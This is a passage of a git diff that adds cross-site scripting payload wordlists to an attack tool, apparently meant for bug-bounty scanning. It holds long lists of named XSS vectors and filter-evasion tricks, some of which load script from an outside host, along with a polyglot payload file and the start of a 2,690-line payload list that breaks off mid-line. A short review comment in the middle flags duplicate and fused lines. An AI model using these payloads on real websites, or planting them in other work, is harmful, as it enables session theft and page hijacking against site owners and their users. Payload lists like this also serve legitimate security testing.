evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +Exploit Description: This more than sophisticated vector is hard to explain - it' creator did here: http://sla.ckers.org/forum/read.php?2,13209,page=2#msg-13409 +Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-containing XSS with no dots +Exploit Name: Self-containing XSS with no dots +Exploit String: with(location)with(hash)eval(substring(1)) +Exploit Description: This vector uses with() to activate the payload behind the fragment identifier. No dots are used to enable easier filter evasion. 
+Exploit Tags: general, super short, self contained +Author Name: ma1 + +Spaces/Meta Chars +Exploit Name: Spaces/Meta Chars +Exploit String: <IMG SRC=" &#14; javascript:alert('XSS');"> +Exploit Description: Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word ”javascript:” - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the ”javascript:” keyword. The actual reality is you can have any char from 1-32 in decimal). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +SSI +Exploit Name: SSI +Exploit String: <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +Exploit Description: SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. +Exploit Tags: general, evil tags, obfuscated, SSI, injection +Author Name: ha.ckers.org + +STYLE +Exploit Name: STYLE +Exploit String: <STYLE TYPE="text/javascript">alert('XSS');</STYLE> +Exploit Description: STYLE tag (Older versions of Netscape only) +Exploit Tags: general, evil tags, style injection, gecko +Author Name: ha.ckers.org + +Style injection via content and double-eval +Exploit Name: Style injection via content and double-eval +Exploit String: <style> +body:after{ +content: “\61\6c\65\72\74\28\31\29″ +} +</style> +<script> +eval(eval(document.styleSheets[0].cssRules[0].style.content)) +</script> +Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed. 
+Exploit Tags: general, onfuscated, style injection +Author Name: .mario + +STYLE w/Anonymous HTML +Exploit Name: STYLE w/Anonymous HTML +Exploit String: <XSS STYLE="xss:expression(alert('XSS'))"> +Exploit Description: Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +STYLE w/background +Exploit Name: STYLE w/background +Exploit String: <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +Exploit Description: STYLE tag using background. +Exploit Tags: general, evil tags, injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/background-image +Exploit Name: STYLE w/background-image +Exploit String: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +Exploit Description: STYLE tag using background-image. +Exploit Tags: general, evil tags, internet explorer, style injection +Author Name: ha.ckers.org + +STYLE w/broken up JavaScript +Exploit Name: STYLE w/broken up JavaScript +Exploit String: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +Exploit Description: STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). 
+Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/Comment +Exploit Name: STYLE w/Comment +Exploit String: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +Exploit Description: STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +Stylesheet +Exploit Name: Stylesheet +Exploit String: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +Exploit Description: Stylesheet +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Style-breaker using obfuscated JavaScript +Exploit Name: Style-breaker using obfuscated JavaScript +Exploit String: }</style><script>a=eval;b=alert;a(b(/i/.source));</script> +Exploit Description: This vector ends styleblocks and uses obfuscated JavaScript to create an alert. +Exploit Tags: general, html breaking, CSS breaking +Author Name: kishor + +Super basic HTML breaker 2 +Exploit Name: Super basic HTML breaker 2 +Exploit String: >"' +Exploit Description: This super basic vector breaks HTML attributes + +Exploit Tags: general, basic, super short, html breaking +Author Name: .mario + +Super short XSS variant 1 +Exploit Name: Super short XSS variant 1 +Exploit String: a=alert + +a(0) +Exploit Description: This extremely short XSS vector works only when newlines can be injected. +Exploit Tags: general, super short +Author Name: .mario + +Super short XSS variant 2 +Exploit Name: Super short XSS variant 2 +Exploit String: A=alert;A(1) +Exploit Description: This extremely short XSS vector works with out the need for newlines to be injected, +Exploit Tags: super short, general, basic +Author Name: -unknown- + +TABLE +Exploit Name: TABLE +Exploit String: <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> +Exploit Description: Table background (who would have thought tables were XSS targets... except me, of course). 
+Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +TD +Exploit Name: TD +Exploit String: <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> +Exploit Description: TD background. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Textarea-breaker with mouseover +Exploit Name: Textarea-breaker with mouseover +Exploit String: </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +Exploit Description: This vector breaks textareas and creates an element reacting on mouveover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Unicode encoded script tags +Exploit Name: Unicode encoded script tags +Exploit String: '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +Exploit Description: This vector uses unicode encoded codepoints to create a script tag producing an alert. +Exploit Tags: general, basic, obfuscated, evil tags +Author Name: OWASP + +URL breaker for double quotes +Exploit Name: URL breaker for double quotes +Exploit String: http://aa"><script>alert(123)</script> +Exploit Description: This vector breaks double quoted URL input +Exploit Tags: URL breaking, general, basic, html breaking +Author Name: .mario + +URL breaker for single quotes +Exploit Name: URL breaker for single quotes +Exploit String: http://aa'><script>alert(123)</script> +Exploit Description: This vector breaks single quoted URL input +Exploit Tags: URL breaking, basic, general, html breaking +Author Name: .mario + +URL encoded image source +Exploit Name: URL encoded image source +Exploit String: >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +Exploit Description: This vector utilizes an urlencoded JS image source to create an alert. 
+Exploit Tags: general, basic, obfuscated, internet explorer +Author Name: OWASP + +URL Encoding +Exploit Name: URL Encoding +Exploit String: <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +URL-breaking vector +Exploit Name: URL-breaking vector +Exploit String: http://aa<script>alert(123)</script> +Exploit Description: This vector is a basic URL breaker - embedding an alert in a URL-like wrapper. +Exploit Tags: general, URL breaking, basic +Author Name: kishor + +US-ASCII encoding +Exploit Name: US-ASCII encoding +Exploit String: %BCscript%BEalert(%A2XSS%A2)%BC/script%BE +Exploit Description: Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +UTF-7 Encoding +Exploit Name: UTF-7 Encoding +Exploit String: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +Exploit Description: UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). 
Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +UTF-8 Unicode Encoding +Exploit Name: UTF-8 Unicode Encoding +Exploit String: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +Exploit Description: UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +with() executing alert via document.__parent__ +Exploit Name: with() executing alert via document.__parent__ +Exploit String: with(document.__parent__)alert(1) +Exploit Description: This vector uses the __parent__ property combined with with() to execute an alert. +Exploit Tags: general, super short, obfuscated, gecko, __property__ +Author Name: .mario + +XML data island w/CDATA +Exploit Name: XML data island w/CDATA +Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> +Exploit Description: XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo. 
+Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML data island w/comment +Exploit Name: XML data island w/comment +Exploit String: <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +Exploit Description: XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive) +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML HTML+TIME +Exploit Name: XML HTML+TIME +Exploit String: <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> +Exploit Description: HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML namespace +Exploit Name: XML namespace +Exploit String: <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> +Exploit Description: XML namespace. The .htc file must be located on the server as your XSS vector. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML predicate XSS using content[n] +Exploit Name: XML predicate XSS using content[n] +Exploit String: y=<a>alert</a>;content[y](123) +Exploit Description: This vector uses XML predicate properties to activate its payload. 
+Exploit Tags: general, XML predicates, gecko +Author Name: PHPIDS Group + +XML (locally hosted) +Exploit Name: XML (locally hosted) +Exploit String: <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> +Exploit Description: Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XSS Quick Test +Exploit Name: XSS Quick Test +Exploit String: '';!--"<XSS>=&{()} +Exploit Description: If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable. +Exploit Tags: general, html breaking, JS breaking, comment breaking +Author Name: ha.ckers.org + +XSS via VBScript MsgBox +Exploit Name: XSS via VBScript MsgBox +Exploit String: Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +Exploit Description: This vector creates an alert like message boy via Visual Basic Script +Exploit Tags: general, basic, internet explorer +Author Name: -unknown- + +__parent__ stored JS alert +Exploit Name: __parent__ stored JS alert +Exploit String: document.__parent__._=alert +_(1) +Exploit Description: This vector uses the __parent__ property to store the alert function and execute it afterwards with new label. +Exploit Tags: general, super short, obfuscated, gecko, __property__ +Author Name: .mario + +__proto__ stored JS alert +Exploit Name: __proto__ stored JS alert +Exploit String: top.__proto__._= alert +_(1) +Exploit Description: This vector uses the __proto__ property to store the alert function and execute it afterwards with new label. 
+Exploit Tags: general, super short, obfuscated, gecko, __property__
+Author Name: .mario
+
+iframe Chrome bypass
+Exploit String: <iframe%20src="javascript:alert(1)
+Author Name: thespanner.co.uk
+
+anchor Chrome bypass
+Exploit String: <a%20href="javascript:alert(1);
+Author Name: thespanner.co.uk
+
+wtf? Chrome
+Exploit String: <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
diff --git a/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt b/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt
new file mode 100644
index 0000000..8a383cf
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt
@@ -0,0 +1,49 @@ +javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> +javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> +javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> +javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` +javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` +javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> +javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script> +javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script> +javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script> +javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script> 
+javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script> +javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script> +javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//> +javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script> +javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//> +javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``> +javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script> +javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//> +javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()> +javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script> +javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()> +javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()> +javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' 
/**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//> +javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script> +javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()> +javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()> +javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()// +javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()> +javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script> +javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()// +javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script> +javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()> +javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()// 
+javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script> +jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//> +javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()> +javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()// +javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script> +javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>> +javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()// +javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)// +javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//* 
+javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/* +javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!-- +javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()> +javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)// diff --git a/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt b/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt new file mode 100644 index 0000000..542c085 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt 
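Review bot: Two of the 49 added lines in XSS-innerht-ml.txt look like paste errors rather than distinct entries: lines 8 and 9 of the new file are byte-identical, and line 26 appears to hold two entries run together, since a second `javascript:` prefix starts mid-line directly after a closing `'>`. The hunk header counts 49 lines and there are 49 `+` markers, so the fused line is in the file itself and not an artefact of how this page was rendered. I would drop the duplicate and move the second half of line 26 onto its own line, so that each line is exactly one test case and a scan does not send redundant or malformed requests to an in-scope target. The file also records nothing about where the list was taken from; a plain wordlist has no comment syntax, so the source and its licence would be better recorded in the README's reference list, which already links other upstream collections.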
@@ -0,0 +1,2690 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y +<image/src/onerror=prompt(8)> +<img/src/onerror=prompt(8)> +<image src/onerror=prompt(8)> +<img src/onerror=prompt(8)> +<image src =q onerror=prompt(8)> +<img src =q onerror=prompt(8)> +</scrip</script>t><img src =q onerror=prompt(8)> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script 
onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown 
html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body 
onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" 
